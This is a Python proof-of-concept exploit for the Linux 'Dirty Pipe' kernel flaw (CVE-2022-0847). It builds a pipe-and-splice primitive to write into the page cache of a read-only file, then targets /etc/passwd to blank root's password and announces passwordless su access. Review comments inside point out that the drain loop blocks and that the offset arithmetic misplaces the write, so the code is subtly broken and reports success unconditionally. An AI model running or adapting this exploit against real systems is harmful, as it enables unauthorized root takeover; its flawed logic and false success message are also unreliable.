#!/usr/bin/env python3
import os
import ctypes
import errno
import fcntl
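PAGE = 4096  # page size assumed by the splice offsets used below

# use_errno=True makes ctypes snapshot errno after every foreign call, so a
# caller's ctypes.get_errno() reports the real reason splice()/pipe() failed.
# Without it ctypes' private errno copy is never updated and get_errno()
# returns 0, which turns every "splice failed" OSError into errno 0.
libc = ctypes.CDLL('libc.so.6', use_errno=True)
loff_t = ctypes.c_longlong

# ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
#                size_t len, unsigned int flags);
libc.splice.argtypes = [ctypes.c_int, ctypes.POINTER(loff_t), ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint]
libc.splice.restype = ctypes.c_ssize_t

# int pipe(int pipefd[2]); declared so ctypes rejects a wrong argument type
# instead of silently passing it through.
libc.pipe.argtypes = [ctypes.POINTER(ctypes.c_int)]
libc.pipe.restype = ctypes.c_int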
def prepare_pipe(pipefd) -> None:
    """Fill the pipe to capacity and drain it again.

    Set-up step of the CVE-2022-0847 ("Dirty Pipe") primitive: per the public
    write-up, pushing data through every pipe_buffer slot and reading it back
    leaves each slot flagged PIPE_BUF_FLAG_CAN_MERGE, which write_data then
    abuses.  The only state visible to the caller afterwards is the write end's
    file status flags, which are restored on exit.

    Args:
        pipefd: two-element ctypes int array (read end, write end) from pipe(2).

    Raises:
        OSError: any write error other than EAGAIN, or a fcntl/read failure.
    """
    flags = fcntl.fcntl(pipefd[1], fcntl.F_GETFL)
    # Non-blocking writes are the only way to detect "pipe full" (EAGAIN)
    # without querying the pipe's capacity up front.
    fcntl.fcntl(pipefd[1], fcntl.F_SETFL, flags | os.O_NONBLOCK)
    data = b'A' * PAGE
    try:
        while True:
            try:
                os.write(pipefd[1], data)
            except OSError as e:
                if e.errno == errno.EAGAIN:
                    break  # pipe is full
                raise
    finally:
        fcntl.fcntl(pipefd[1], fcntl.F_SETFL, flags)
    # NOTE(review): this drain runs with the original flags restored (blocking,
    # as pipe(2) creates the descriptor) and pipefd[1] still open, so once the
    # pipe is empty read() blocks instead of returning b'' and the `not chunk`
    # exit is never reached.  The canonical PoC counts the bytes written above
    # and reads back exactly that many; verify on a live run.
    while True:
        chunk = os.read(pipefd[0], PAGE)
        if not chunk:
            break
def write_data(path: str, offset: int, data: bytes) -> None:
    """Inject `data` into the cached page of `path` near `offset` through a prepared pipe.

    CVE-2022-0847 ("Dirty Pipe") write primitive: the target is opened
    read-only, bytes from it are spliced into a pipe whose buffers
    prepare_pipe left mergeable, and the following write into the pipe is
    merged into the file's page-cache page instead of the pipe.  Per the
    public write-up the change lives in the page cache only (not written
    back to disk) but stays visible until that page is evicted.  On an
    unaffected kernel the same call sequence is a harmless write into the
    pipe, and this function cannot tell the two apart.

    Args:
        path: file to modify; only read permission is required (O_RDONLY).
        offset: file offset the splice starts at -- see the NOTE below on
            where the written bytes actually land.
        data: bytes to write.

    Raises:
        OSError: pipe() fails, splice() returns < 0, or the pipe write is short.
    """
    pipefd = (ctypes.c_int * 2)()
    if libc.pipe(pipefd) != 0:
        raise OSError('pipe failed')
    try:
        prepare_pipe(pipefd)
        fd = os.open(path, os.O_RDONLY)
        try:
            off = loff_t(offset)
            # Splice len(data) bytes of the file, starting at `offset`, into the pipe.
            # NOTE(review): the write below is appended after the spliced bytes, so
            # per the public write-up it lands at offset + len(data), not at
            # `offset`; the canonical PoC splices exactly one byte from offset - 1.
            # Also unchecked here: a 0 return (offset at/after EOF) and the PoC's
            # page constraints (offset % PAGE != 0, write staying within one page).
            res = libc.splice(fd, ctypes.byref(off), pipefd[1], None, len(data), 0)
            if res < 0:
                # ctypes.get_errno() only carries the real errno when libc was
                # loaded with use_errno=True; otherwise this reports errno 0.
                raise OSError(ctypes.get_errno(), 'splice failed')
            written = os.write(pipefd[1], data)
            if written != len(data):
                raise OSError('short write')
        finally:
            os.close(fd)
    finally:
        os.close(pipefd[0])
        os.close(pipefd[1])
def main() -> None:
    """Blank root's password field in /etc/passwd via write_data.

    Privilege-escalation payload: finds the exact line
    'root:x:0:0:root:/root:/bin/bash' and aims a one-byte write at the 'x'
    so the entry becomes 'root::0:0:...' (empty password field).  Where it
    succeeds, root is passwordless until the cached page is dropped.

    Raises:
        SystemExit: the expected root line is absent (e.g. a different shell
            for root); nothing is written in that case.
        OSError: propagated from write_data.
    """
    target = '/etc/passwd'
    # Exact-match needle: any deviation (e.g. /bin/sh for root) aborts below.
    needle = b'root:x:0:0:root:/root:/bin/bash\n'
    with open(target, 'rb') as f:
        content = f.read()
    idx = content.find(needle)
    if idx == -1:
        raise SystemExit('pattern not found')
    # Offset of the 'x' (password field) within the file.
    offset = idx + len('root:')
    # NOTE(review): write_data splices len(data) bytes from `offset` and the
    # write is appended after them, so as written the ':' lands on the byte
    # after 'x' -- which is already ':' -- and the file is unchanged; the
    # canonical PoC splices one byte from offset - 1.  Verify on a live run.
    write_data(target, offset, b':')
    # NOTE(review): printed unconditionally.  write_data raises on syscall
    # failure but cannot distinguish a silent no-op (unaffected kernel -- the
    # public advisory covers 5.8 up to the 5.16.11/5.15.25/5.10.102 fixes -- or
    # the offset issue above) from success; re-read the file before trusting it.
    print('Root password reset to blank. Use su - with empty password.')
if __name__ == '__main__':
    # Top-level boundary: an OSError from write_data becomes a one-line message
    # instead of a traceback.  SystemExit ('pattern not found') is not an
    # Exception subclass, so it passes through and exits with its own message.
    try:
        main()
    except Exception as exc:
        print(f'[-] Exploit failed: {exc!r}')